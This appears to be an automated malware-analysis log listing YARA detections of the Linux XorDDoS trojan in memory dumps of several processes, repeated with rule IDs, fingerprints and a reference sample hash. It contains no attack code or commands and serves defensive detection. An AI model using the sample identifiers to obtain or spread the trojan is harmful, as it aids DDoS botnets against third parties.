Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6426.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6331.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
